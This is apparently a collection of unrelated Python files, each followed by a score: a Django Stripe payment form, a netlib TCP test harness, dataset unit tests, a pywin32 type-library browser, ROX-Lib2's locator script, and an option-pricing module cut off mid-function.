from django import forms from decimal import * from django.core.validators import RegexValidator class CheckoutForm(forms.Form): amount = forms.DecimalField( label = 'Amount ($)', min_value = Decimal('0.50'), decimal_places = 2, required = True, ) description = forms.CharField( label = 'Description (Optional)', required = False, ) feepayment = forms.ChoiceField( label = 'Transaction fee', required = True, choices = ( ('absorb', 'Absorb'), ('transmit', 'Transmit'), ), widget = forms.RadioSelect, initial = 'absorb' ) card = forms.ChoiceField( label = 'Card', required = False, choices = ( ('dom', 'Domestic'), ('intl', 'International'), ), widget = forms.RadioSelect, initial = 'dom' ) class PaymentForm(forms.Form): # Do not require number, exp or cvc # Because Stripe takes these and produces a token # When a token is ready, they are no longer required. number = forms.CharField( required = False, label = 'Card number', max_length = 20 ) exp = forms.CharField( required = False, label = 'Expiry (MM/YY)', max_length = 7 ) cvc = forms.CharField( required = False, label = 'CVC', max_length = 4 ) email = forms.EmailField( required = False, min_length=3, label = 'Email, for receipt delivery (Optional)', ) postcode = forms.CharField( required = False, label = 'Postcode', )
0.048747
from __future__ import (absolute_import, print_function, division) import threading from six.moves import queue from io import StringIO import OpenSSL from netlib import tcp from netlib import tutils class _ServerThread(threading.Thread): def __init__(self, server): self.server = server threading.Thread.__init__(self) def run(self): self.server.serve_forever() def shutdown(self): self.server.shutdown() class _TServer(tcp.TCPServer): def __init__(self, ssl, q, handler_klass, addr, **kwargs): """ ssl: A dictionary of SSL parameters: cert, key, request_client_cert, cipher_list, dhparams, v3_only """ tcp.TCPServer.__init__(self, addr) if ssl is True: self.ssl = dict() elif isinstance(ssl, dict): self.ssl = ssl else: self.ssl = None self.q = q self.handler_klass = handler_klass if self.handler_klass is not None: self.handler_klass.kwargs = kwargs self.last_handler = None def handle_client_connection(self, request, client_address): h = self.handler_klass(request, client_address, self) self.last_handler = h if self.ssl is not None: cert = self.ssl.get( "cert", tutils.test_data.path("data/server.crt")) raw_key = self.ssl.get( "key", tutils.test_data.path("data/server.key")) key = OpenSSL.crypto.load_privatekey( OpenSSL.crypto.FILETYPE_PEM, open(raw_key, "rb").read()) if self.ssl.get("v3_only", False): method = OpenSSL.SSL.SSLv3_METHOD options = OpenSSL.SSL.OP_NO_SSLv2 | OpenSSL.SSL.OP_NO_TLSv1 else: method = OpenSSL.SSL.SSLv23_METHOD options = None h.convert_to_ssl( cert, key, method=method, options=options, handle_sni=getattr(h, "handle_sni", None), request_client_cert=self.ssl.get("request_client_cert", None), cipher_list=self.ssl.get("cipher_list", None), dhparams=self.ssl.get("dhparams", None), chain_file=self.ssl.get("chain_file", None), alpn_select=self.ssl.get("alpn_select", None) ) h.handle() h.finish() def handle_error(self, connection, client_address, fp=None): s = StringIO() tcp.TCPServer.handle_error(self, connection, client_address, s) self.q.put(s.getvalue()) class ServerTestBase(object): ssl = None handler = None addr = ("localhost", 0) @classmethod def setup_class(cls, **kwargs): cls.q = queue.Queue() s = cls.makeserver(**kwargs) cls.port = s.address.port cls.server = _ServerThread(s) cls.server.start() @classmethod def makeserver(cls, **kwargs): return _TServer(cls.ssl, cls.q, cls.handler, cls.addr, **kwargs) @classmethod def teardown_class(cls): cls.server.shutdown() def teardown(self): self.server.server.wait_for_silence() @property def last_handler(self): return self.server.server.last_handler
0
from tempfile import NamedTemporaryFile import numpy import pytest import theano from decorator import contextmanager from lasagne.utils import floatX from .data import DataSet, cifar, cifar_lee14, mnist, mnist_distractor, \ svhn, svhn_huang16 def identical_dataset(set1, set2, max_bs=500): lenght = len(set1.data) batchsize = next(i for i in range(max_bs, 0, -1) if lenght % i == 0) assert lenght == len(set2.data) for (x1, y1), (x2, y2) in zip(set1.iter(batchsize), set2.iter(batchsize)): assert numpy.allclose(x1, x2) assert numpy.all(y1 == y2) return True @contextmanager def from_state_file(dataset, frmt='npz', **kwargs): tmp = NamedTemporaryFile(suffix=f'.{frmt}') try: dataset.save_state(tmp.name, **kwargs) yield type(dataset).from_state(tmp.name) finally: tmp.close() def check_data(data): assert hasattr(data, 'data') assert hasattr(data, 'labels') assert hasattr(data, 'set') assert data.set == (data.data, data.labels) return True def check_dims(data, data_shape): length = data_shape[0] assert data.data.shape == data_shape assert data.labels.shape == (length, ) assert len(data.data) == length assert len(data.labels) == length return True def check_interval(data, lmin, lmax, soft=False): lmin, lmax = floatX(lmin), floatX(lmax) if soft: return numpy.min(data) >= lmin and numpy.max(data) <= lmax return numpy.min(data) == lmin and numpy.max(data) == lmax class Simple(): @staticmethod def identical_data(baseline, copy): assert identical_dataset(baseline.training, copy.training) assert identical_dataset(baseline.validation, copy.validation) return True def test_create(self): dataset = self.dataset_cls() assert dataset.training assert check_data(dataset.training) assert dataset.validation assert check_data(dataset.validation) assert dataset.test is None def test_dims(self): dataset = self.dataset_cls() assert check_dims(dataset.training, self.train_shape) assert check_dims(dataset.validation, self.valid_shape) def test_dtypes(self): dataset = self.dataset_cls() data = dataset.training.data[:] assert data.dtype == theano.config.floatX assert dataset.training.labels.dtype == numpy.dtype('int32') data = dataset.validation.data[:] assert data.dtype == theano.config.floatX assert dataset.validation.labels.dtype == numpy.dtype('int32') def test_state(self): dataset = self.dataset_cls() state = dataset.state assert state assert isinstance(state, dict) assert 'training' in state assert state['training'] assert isinstance(state['training'], dict) assert 'validation' in state assert state['validation'] assert isinstance(state['validation'], dict) assert 'test' not in state def test_from_state(self): dataset = self.dataset_cls() copy = self.dataset_cls.from_state(dataset.state) assert self.identical_data(dataset, copy) def test_from_state_iter(self): dataset = self.dataset_cls() for _ in dataset.training.iter(100): pass copy = self.dataset_cls.from_state(dataset.state) assert self.identical_data(dataset, copy) def test_from_state_file_numpy(self): dataset = self.dataset_cls() with from_state_file(dataset) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_numpy_compressed(self): dataset = self.dataset_cls() with from_state_file(dataset, compression=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_chunked(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', chunks=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_lzf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_szip(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='szip') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip_0(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip', compression_opts=0) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip_9(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip', compression_opts=9) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_shuffle(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_shuffle_lzf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf', shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_fletcher32(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', fletcher32=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_someconf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf', fletcher32=True, shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_all_labels(self): dataset = self.dataset_cls() labels = numpy.concatenate((dataset.training.labels, dataset.validation.labels)) labels = set(labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_train_labels(self): dataset = self.dataset_cls() labels = set(dataset.training.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_valid_labels(self): dataset = self.dataset_cls() labels = set(dataset.validation.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_interval(self): dataset = self.dataset_cls() assert check_interval(dataset.training.data, 0, 1) assert check_interval(dataset.validation.data, 0, 1) dataset = self.dataset_cls(interval=None) assert check_interval(dataset.training.data, *self.interval, soft=True) assert check_interval(dataset.validation.data, *self.interval, soft=True) dataset = self.dataset_cls(interval=(-1, 1)) assert check_interval(dataset.training.data, -1, 1) assert check_interval(dataset.validation.data, -1, 1) dataset = self.dataset_cls(interval=(-7, -1)) assert check_interval(dataset.training.data, -7, -1) assert check_interval(dataset.validation.data, -7, -1) dataset = self.dataset_cls(interval=(3.5, 4.4)) assert check_interval(dataset.training.data, 3.5, 4.4) assert check_interval(dataset.validation.data, 3.5, 4.4) dataset = self.dataset_cls(interval=(-3, 0)) assert check_interval(dataset.training.data, -3, 0) assert check_interval(dataset.validation.data, -3, 0) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(2, -1)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(-6, -12)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(0, 0)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(1, 1)) class SplitNumber(Simple): def test_create(self): super(SplitNumber, self).test_create() dataset = self.dataset_cls(testsplit=100) assert dataset.test dataset = self.dataset_cls(testsplit=None) assert dataset.test is None dataset = self.dataset_cls(testsplit=0) assert dataset.test is None dataset = self.dataset_cls(testsplit=0.2) assert dataset.test with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=-0.4) with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=-200) with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=1000000000) def test_dims(self): super(SplitNumber, self).test_dims() dataset = self.dataset_cls(testsplit=100) train_shape = (self.train_shape[0] - 100, ) + self.train_shape[1:] test_shape = (100, ) + self.train_shape[1:] assert check_dims(dataset.training, train_shape) assert check_dims(dataset.test, test_shape) dataset = self.dataset_cls(testsplit=0.2) split = int(0.2 * self.train_shape[0]) train_shape = (self.train_shape[0] - split, ) + self.train_shape[1:] test_shape = (split, ) + self.train_shape[1:] assert check_dims(dataset.training, train_shape) assert check_dims(dataset.test, test_shape) def test_dtypes(self): super(SplitNumber, self).test_dtypes() dataset = self.dataset_cls(testsplit=100) data = dataset.test.data[:] assert data.dtype == theano.config.floatX assert dataset.test.labels.dtype == numpy.dtype('int32') def test_state(self): super(SplitNumber, self).test_state() dataset = self.dataset_cls(testsplit=100) assert dataset.state['test'] assert isinstance(dataset.state['test'], dict) dataset = self.dataset_cls(testsplit=None) assert 'test' not in dataset.state dataset = self.dataset_cls(testsplit=0) assert 'test' not in dataset.state dataset = self.dataset_cls(testsplit=0.2) assert dataset.state['test'] assert isinstance(dataset.state['test'], dict) def test_from_state(self): super(SplitNumber, self).test_from_state() dataset = self.dataset_cls(testsplit=100) copy = self.dataset_cls.from_state(dataset.state) assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def test_from_state_file_numpy(self): super(SplitNumber, self).test_from_state_file_numpy() dataset = self.dataset_cls(testsplit=100) with from_state_file(dataset) as copy: assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def test_from_state_file_h5(self): super(SplitNumber, self).test_from_state_file_h5() dataset = self.dataset_cls(testsplit=100) with from_state_file(dataset, frmt='h5') as copy: assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def test_interval(self): super(SplitNumber, self).test_interval() dataset = self.dataset_cls(testsplit=100) assert check_interval(dataset.training.data, 0, 1, soft=True) assert check_interval(dataset.test.data, 0, 1, soft=True) dataset = self.dataset_cls(interval=None, testsplit=0.1) assert check_interval(dataset.training.data, *self.interval, soft=True) assert check_interval(dataset.test.data, *self.interval, soft=True) dataset = self.dataset_cls(interval=(-1, 1), testsplit=0.1) assert check_interval(dataset.training.data, -1, 1, soft=True) assert check_interval(dataset.test.data, -1, 1, soft=True) dataset = self.dataset_cls(interval=(-7, -1), testsplit=150) assert check_interval(dataset.training.data, -7, -1, soft=True) assert check_interval(dataset.test.data, -7, -1, soft=True) dataset = self.dataset_cls(interval=(3.5, 4.4), testsplit=200) assert check_interval(dataset.training.data, 3.5, 4.4, soft=True) assert check_interval(dataset.test.data, 3.5, 4.4, soft=True) dataset = self.dataset_cls(interval=(-3, 0), testsplit=0.2) assert check_interval(dataset.training.data, -3, 0, soft=True) assert check_interval(dataset.test.data, -3, 0, soft=True) class SplitValid(Simple): def test_create(self): super(SplitValid, self).test_create() dataset = self.dataset_cls(testsplit='validation') assert dataset.test assert dataset.validation assert dataset.test is dataset.validation def test_state(self): super(SplitValid, self).test_state() dataset = self.dataset_cls(testsplit='validation') state = dataset.state assert state['test'] == 'validation' def test_from_state(self): super(SplitValid, self).test_from_state() dataset = self.dataset_cls(testsplit='validation') copy = self.dataset_cls.from_state(dataset.state) assert copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) def test_from_state_file_numpy(self): super(SplitValid, self).test_from_state_file_numpy() dataset = self.dataset_cls(testsplit='validation') with from_state_file(dataset) as copy: assert copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) def test_from_state_file_h5(self): super(SplitValid, self).test_from_state_file_h5() dataset = self.dataset_cls(testsplit='validation') with from_state_file(dataset, frmt='h5') as copy: assert copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) class Base(SplitNumber, SplitValid, Simple): pass class AlwaysTestSet(Simple): @staticmethod def identical_data(baseline, copy): assert identical_dataset(baseline.training, copy.training) assert identical_dataset(baseline.test, copy.test) assert identical_dataset(baseline.validation, copy.validation) return True def test_testsplit(self): with pytest.raises(ValueError): self.dataset_cls(testsplit=0.1) def test_create(self): dataset = self.dataset_cls() assert dataset.training assert check_data(dataset.training) assert dataset.validation assert check_data(dataset.validation) assert dataset.test assert check_data(dataset.test) def test_dims(self): dataset = self.dataset_cls() assert check_dims(dataset.training, self.train_shape) assert check_dims(dataset.test, self.test_shape) assert check_dims(dataset.validation, self.valid_shape) def test_dtypes(self): dataset = self.dataset_cls() data = dataset.training.data[:] assert data.dtype == theano.config.floatX assert dataset.training.labels.dtype == numpy.dtype('int32') data = dataset.test.data[:] assert data.dtype == theano.config.floatX assert dataset.test.labels.dtype == numpy.dtype('int32') data = dataset.validation.data[:] assert data.dtype == theano.config.floatX assert dataset.validation.labels.dtype == numpy.dtype('int32') def test_all_labels(self): dataset = self.dataset_cls() labels = numpy.concatenate((dataset.training.labels, dataset.test.labels, dataset.validation.labels)) labels = set(labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_test_labels(self): dataset = self.dataset_cls() labels = set(dataset.test.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_state(self): dataset = self.dataset_cls() state = dataset.state assert state assert isinstance(state, dict) assert 'training' in state assert state['training'] assert isinstance(state['training'], dict) assert 'validation' in state assert state['validation'] assert isinstance(state['validation'], dict) assert 'test' in state assert state['test'] assert isinstance(state['test'], dict) def check_dict(dct): assert isinstance(dct, dict) def check(prefix): x_key = f'{prefix} data' y_key = f'{prefix} labels' assert x_key in dct assert y_key in dct x_val = dct[x_key] y_val = dct[y_key] assert x_val.shape[0] == y_val.shape[0] assert len(x_val) == len(y_val) return True assert check('training') assert check('validation') return True class RealMixin(): def test_download(self): pytest.skip() def test_extract(self): dataset = self.dataset_cls() assert check_dict(dataset.extract()) def test_load(self): dataset = self.dataset_cls() assert check_dict(dataset.load()) class Real(RealMixin, Base): pass class ExampleDataSet(DataSet): """Example data set for testing.""" def download(*args, **kwargs): pass def extract(self, *args, **kwargs): return { 'training data': numpy.random.uniform(0, 256, (1000, 1, 16, 16)), 'training labels': numpy.random.uniform(0, 10, 1000), 'validation data': numpy.random.uniform(0, 256, (200, 1, 16, 16)), 'validation labels': numpy.random.uniform(0, 10, 200) } class TestExample(Base): dataset_cls = ExampleDataSet train_shape = (1000, 1, 16, 16) valid_shape = (200, 1, 16, 16) interval = (0, 256) num_labels = 10 class TestCIFAR10(Real): dataset_cls = cifar.CIFAR10 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) interval = (0, 255) num_labels = 10 class TestCIFAR100(Real): dataset_cls = cifar.CIFAR100 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) interval = (0, 255) num_labels = 100 class TestMNIST(Real): dataset_cls = mnist.MNIST train_shape = (60000, 1, 28, 28) valid_shape = (10000, 1, 28, 28) interval = (0, 255) num_labels = 10 class TestSVHN(Real): dataset_cls = svhn.SVHN train_shape = (73257, 3, 32, 32) valid_shape = (26032, 3, 32, 32) interval = (0, 255) num_labels = 10 class TestFullSVHN(RealMixin, Simple): dataset_cls = svhn.FullSVHN train_shape = (604388, 3, 32, 32) valid_shape = (26032, 3, 32, 32) interval = (0, 255) num_labels = 10 def test_interval(self): pytest.skip() def test_from_state_file_numpy(self): pytest.skip() def test_from_state_file_numpy_compressed(self): pytest.skip() class TestMNISTDistractor(Real): dataset_cls = mnist_distractor.Distractor train_shape = (60000, 1, 28, 56) valid_shape = (10000, 1, 28, 56) interval = (0, 255) num_labels = 2 class TestAugCIFAR10(Real): dataset_cls = cifar_lee14.CIFAR10 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) num_labels = 10 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) class TestAugCIFAR100(Real): dataset_cls = cifar_lee14.CIFAR100 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) num_labels = 100 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) class TestAugSVHN(RealMixin, AlwaysTestSet): dataset_cls = svhn_huang16.Normalized train_shape = (598388, 3, 32, 32) test_shape = (6000, 3, 32, 32) valid_shape = (26032, 3, 32, 32) num_labels = 10 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) def test_from_state_file_numpy(self): pytest.skip() def test_from_state_file_numpy_compressed(self): pytest.skip()
0
import win32ui import win32con import win32api import commctrl import pythoncom from pywin.mfc import dialog class TLBrowserException(Exception): "TypeLib browser internal error" error = TLBrowserException FRAMEDLG_STD = win32con.WS_CAPTION | win32con.WS_SYSMENU SS_STD = win32con.WS_CHILD | win32con.WS_VISIBLE BS_STD = SS_STD | win32con.WS_TABSTOP ES_STD = BS_STD | win32con.WS_BORDER LBS_STD = ES_STD | win32con.LBS_NOTIFY | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL CBS_STD = ES_STD | win32con.CBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL typekindmap = { pythoncom.TKIND_ENUM : 'Enumeration', pythoncom.TKIND_RECORD : 'Record', pythoncom.TKIND_MODULE : 'Module', pythoncom.TKIND_INTERFACE : 'Interface', pythoncom.TKIND_DISPATCH : 'Dispatch', pythoncom.TKIND_COCLASS : 'CoClass', pythoncom.TKIND_ALIAS : 'Alias', pythoncom.TKIND_UNION : 'Union' } TypeBrowseDialog_Parent=dialog.Dialog class TypeBrowseDialog(TypeBrowseDialog_Parent): "Browse a type library" IDC_TYPELIST = 1000 IDC_MEMBERLIST = 1001 IDC_PARAMLIST = 1002 IDC_LISTVIEW = 1003 def __init__(self, typefile = None): TypeBrowseDialog_Parent.__init__(self, self.GetTemplate()) try: if typefile: self.tlb = pythoncom.LoadTypeLib(typefile) else: self.tlb = None except pythoncom.ole_error: self.MessageBox("The file does not contain type information") self.tlb = None self.HookCommand(self.CmdTypeListbox, self.IDC_TYPELIST) self.HookCommand(self.CmdMemberListbox, self.IDC_MEMBERLIST) def OnAttachedObjectDeath(self): self.tlb = None self.typeinfo = None self.attr = None return TypeBrowseDialog_Parent.OnAttachedObjectDeath(self) def _SetupMenu(self): menu = win32ui.CreateMenu() flags=win32con.MF_STRING|win32con.MF_ENABLED menu.AppendMenu(flags, win32ui.ID_FILE_OPEN, "&Open...") menu.AppendMenu(flags, win32con.IDCANCEL, "&Close") mainMenu = win32ui.CreateMenu() mainMenu.AppendMenu(flags|win32con.MF_POPUP, menu.GetHandle(), "&File") self.SetMenu(mainMenu) self.HookCommand(self.OnFileOpen,win32ui.ID_FILE_OPEN) def OnFileOpen(self, id, code): openFlags = win32con.OFN_OVERWRITEPROMPT | win32con.OFN_FILEMUSTEXIST fspec = "Type Libraries (*.tlb, *.olb)|*.tlb;*.olb|OCX Files (*.ocx)|*.ocx|DLL's (*.dll)|*.dll|All Files (*.*)|*.*||" dlg = win32ui.CreateFileDialog(1, None, None, openFlags, fspec) if dlg.DoModal() == win32con.IDOK: try: self.tlb = pythoncom.LoadTypeLib(dlg.GetPathName()) except pythoncom.ole_error: self.MessageBox("The file does not contain type information") self.tlb = None self._SetupTLB() def OnInitDialog(self): self._SetupMenu() self.typelb = self.GetDlgItem(self.IDC_TYPELIST) self.memberlb = self.GetDlgItem(self.IDC_MEMBERLIST) self.paramlb = self.GetDlgItem(self.IDC_PARAMLIST) self.listview = self.GetDlgItem(self.IDC_LISTVIEW) # Setup the listview columns itemDetails = (commctrl.LVCFMT_LEFT, 100, "Item", 0) self.listview.InsertColumn(0, itemDetails) itemDetails = (commctrl.LVCFMT_LEFT, 1024, "Details", 0) self.listview.InsertColumn(1, itemDetails) if self.tlb is None: self.OnFileOpen(None,None) else: self._SetupTLB() return TypeBrowseDialog_Parent.OnInitDialog(self) def _SetupTLB(self): self.typelb.ResetContent() self.memberlb.ResetContent() self.paramlb.ResetContent() self.typeinfo = None self.attr = None if self.tlb is None: return n = self.tlb.GetTypeInfoCount() for i in range(n): self.typelb.AddString(self.tlb.GetDocumentation(i)[0]) def _SetListviewTextItems(self, items): self.listview.DeleteAllItems() index = -1 for item in items: index = self.listview.InsertItem(index+1,item[0]) data = item[1] if data is None: data = "" self.listview.SetItemText(index, 1, data) def SetupAllInfoTypes(self): infos = self._GetMainInfoTypes() + self._GetMethodInfoTypes() self._SetListviewTextItems(infos) def _GetMainInfoTypes(self): pos = self.typelb.GetCurSel() if pos<0: return [] docinfo = self.tlb.GetDocumentation(pos) infos = [('GUID', str(self.attr[0]))] infos.append(('Help File', docinfo[3])) infos.append(('Help Context', str(docinfo[2]))) try: infos.append(('Type Kind', typekindmap[self.tlb.GetTypeInfoType(pos)])) except: pass info = self.tlb.GetTypeInfo(pos) attr = info.GetTypeAttr() infos.append(('Attributes', str(attr))) for j in range(attr[8]): flags = info.GetImplTypeFlags(j) refInfo = info.GetRefTypeInfo(info.GetRefTypeOfImplType(j)) doc = refInfo.GetDocumentation(-1) attr = refInfo.GetTypeAttr() typeKind = attr[5] typeFlags = attr[11] desc = doc[0] desc = desc + ", Flags=0x%x, typeKind=0x%x, typeFlags=0x%x" % (flags, typeKind, typeFlags) if flags & pythoncom.IMPLTYPEFLAG_FSOURCE: desc = desc + "(Source)" infos.append( ('Implements', desc)) return infos def _GetMethodInfoTypes(self): pos = self.memberlb.GetCurSel() if pos<0: return [] realPos, isMethod = self._GetRealMemberPos(pos) ret = [] if isMethod: funcDesc = self.typeinfo.GetFuncDesc(realPos) id = funcDesc[0] ret.append(("Func Desc", str(funcDesc))) else: id = self.typeinfo.GetVarDesc(realPos)[0] docinfo = self.typeinfo.GetDocumentation(id) ret.append(('Help String', docinfo[1])) ret.append(('Help Context', str(docinfo[2]))) return ret def CmdTypeListbox(self, id, code): if code == win32con.LBN_SELCHANGE: pos = self.typelb.GetCurSel() if pos >= 0: self.memberlb.ResetContent() self.typeinfo = self.tlb.GetTypeInfo(pos) self.attr = self.typeinfo.GetTypeAttr() for i in range(self.attr[7]): id = self.typeinfo.GetVarDesc(i)[0] self.memberlb.AddString(self.typeinfo.GetNames(id)[0]) for i in range(self.attr[6]): id = self.typeinfo.GetFuncDesc(i)[0] self.memberlb.AddString(self.typeinfo.GetNames(id)[0]) self.SetupAllInfoTypes() return 1 def _GetRealMemberPos(self, pos): pos = self.memberlb.GetCurSel() if pos >= self.attr[7]: return pos - self.attr[7], 1 elif pos >= 0: return pos, 0 else: raise error("The position is not valid") def CmdMemberListbox(self, id, code): if code == win32con.LBN_SELCHANGE: self.paramlb.ResetContent() pos = self.memberlb.GetCurSel() realPos, isMethod = self._GetRealMemberPos(pos) if isMethod: id = self.typeinfo.GetFuncDesc(realPos)[0] names = self.typeinfo.GetNames(id) for i in range(len(names)): if i > 0: self.paramlb.AddString(names[i]) self.SetupAllInfoTypes() return 1 def GetTemplate(self): "Return the template used to create this dialog" w = 272 # Dialog width h = 192 # Dialog height style = FRAMEDLG_STD | win32con.WS_VISIBLE | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX template = [['Type Library Browser', (0, 0, w, h), style, None, (8, 'Helv')], ] template.append([130, "&Type", -1, (10, 10, 62, 9), SS_STD | win32con.SS_LEFT]) template.append([131, None, self.IDC_TYPELIST, (10, 20, 80, 80), LBS_STD]) template.append([130, "&Members", -1, (100, 10, 62, 9), SS_STD | win32con.SS_LEFT]) template.append([131, None, self.IDC_MEMBERLIST, (100, 20, 80, 80), LBS_STD]) template.append([130, "&Parameters", -1, (190, 10, 62, 9), SS_STD | win32con.SS_LEFT]) template.append([131, None, self.IDC_PARAMLIST, (190, 20, 75, 80), LBS_STD]) lvStyle = SS_STD | commctrl.LVS_REPORT | commctrl.LVS_AUTOARRANGE | commctrl.LVS_ALIGNLEFT | win32con.WS_BORDER | win32con.WS_TABSTOP template.append(["SysListView32", "", self.IDC_LISTVIEW, (10, 110, 255, 65), lvStyle]) return template if __name__=='__main__': import sys fname = None try: fname = sys.argv[1] except: pass dlg = TypeBrowseDialog(fname) try: win32api.GetConsoleTitle() dlg.DoModal() except: dlg.CreateWindow(win32ui.GetMainFrame())
0.030731
# Most of the common code needed by ROX applications is in ROX-Lib2. # Except this code, which is needed to find ROX-Lib2 in the first place! # Just make sure you run findrox.version() before importing anything inside # ROX-Lib2... import os, sys from os.path import exists import string def version(major, minor, micro): """Find ROX-Lib2, with a version >= (major, minor, micro), and add it to sys.path. If version is missing or too old, either prompt the user, or (if possible) upgrade it automatically. If 'rox' is already in PYTHONPATH, just use that (assume the injector is being used).""" try: import rox except ImportError: pass else: #print "Using ROX-Lib in PYTHONPATH" if (major, minor, micro) > rox.roxlib_version: print >>sys.stderr, "WARNING: ROX-Lib version " \ "%d.%d.%d requested, but using version " \ "%d.%d.%d from %s" % \ (major, minor, micro, rox.roxlib_version[0], rox.roxlib_version[1], rox.roxlib_version[2], rox.__file__) return if not os.getenv('ROXLIB_DISABLE_ZEROINSTALL') and os.path.exists('/uri/0install/rox.sourceforge.net'): # We're using ZeroInstall. Good :-) zpath = '/uri/0install/rox.sourceforge.net/lib/ROX-Lib2/' \ 'latest-2' if not os.path.exists(zpath): os.system('0refresh rox.sourceforge.net') assert os.path.exists(zpath) vs = os.readlink(zpath).split('-')[-1] v = tuple(map(int, vs.split('.'))) if v < (major, minor, micro): if os.system('0refresh rox.sourceforge.net'): report_error('Using ROX-Lib in Zero Install, but cached version (%s) is too old (need %d.%d.%d) and updating failed (is zero-install running?)' % (vs, major, minor, micro)) sys.path.append(zpath + '/python') return try: path = os.environ['LIBDIRPATH'] paths = string.split(path, ':') except KeyError: paths = [os.environ['HOME'] + '/lib', '/usr/local/lib', '/usr/lib' ] for p in paths: p = os.path.join(p, 'ROX-Lib2') if exists(p): # TODO: check version is new enough sys.path.append(os.path.join(p, 'python')) import rox if major == 1 and minor == 9 and micro < 10: return # Can't check version if not hasattr(rox, 'roxlib_version'): break if (major, minor, micro) <= rox.roxlib_version: return # OK report_error("This program needs ROX-Lib2 (version %d.%d.%d) " % \ (major, minor, micro) + "to run.\n" + \ "I tried all of these places:\n\n" + \ string.join(paths, '\n') + '\n\n' + \ "ROX-Lib2 is available from:\n" + \ "http://rox.sourceforge.net") def report_error(err): "Write 'error' to stderr and, if possible, display a dialog box too." try: sys.stderr.write('*** ' + err + '\n') except: pass try: import pygtk; pygtk.require('2.0') import gtk; g = gtk except: import gtk win = gtk.GtkDialog() message = gtk.GtkLabel(err + '\n\nAlso, pygtk2 needs to be present') win.set_title('Missing ROX-Lib2') win.set_position(gtk.WIN_POS_CENTER) message.set_padding(20, 20) win.vbox.pack_start(message) ok = gtk.GtkButton("OK") ok.set_flags(gtk.CAN_DEFAULT) win.action_area.pack_start(ok) ok.connect('clicked', gtk.mainquit) ok.grab_default() win.connect('destroy', gtk.mainquit) win.show_all() gtk.mainloop() else: box = g.MessageDialog(None, g.MESSAGE_ERROR, 0, g.BUTTONS_OK, err) box.set_title('Missing ROX-Lib2') box.set_position(g.WIN_POS_CENTER) box.set_default_response(g.RESPONSE_OK) box.run() sys.exit(1)
0.035424
from scipy import stats from math import log, pow, sqrt, exp from typing import Tuple cdf = stats.norm.cdf pdf = stats.norm.pdf def calculate_d1( s: float, k: float, r: float, t: float, v: float ) -> float: """Calculate option D1 value""" d1: float = (log(s / k) + (0.5 * pow(v, 2)) * t) / (v * sqrt(t)) return d1 def calculate_price( s: float, k: float, r: float, t: float, v: float, cp: int, d1: float = 0.0 ) -> float: """Calculate option price""" # Return option space value if volatility not positive if v <= 0: return max(0, cp * (s - k)) if not d1: d1: float = calculate_d1(s, k, r, t, v) d2: float = d1 - v * sqrt(t) price: float = cp * (s * cdf(cp * d1) - k * cdf(cp * d2)) * exp(-r * t) return price def calculate_delta( s: float, k: float, r: float, t: float, v: float, cp: int, d1: float = 0.0 ) -> float: """Calculate option delta""" if v <= 0: return 0 if not d1: d1: float = calculate_d1(s, k, r, t, v) _delta: float = cp * exp(-r * t) * cdf(cp * d1) delta: float = _delta * s * 0.01 return delta def calculate_gamma( s: float, k: float, r: float, t: float, v: float, d1: float = 0.0 ) -> float: """Calculate option 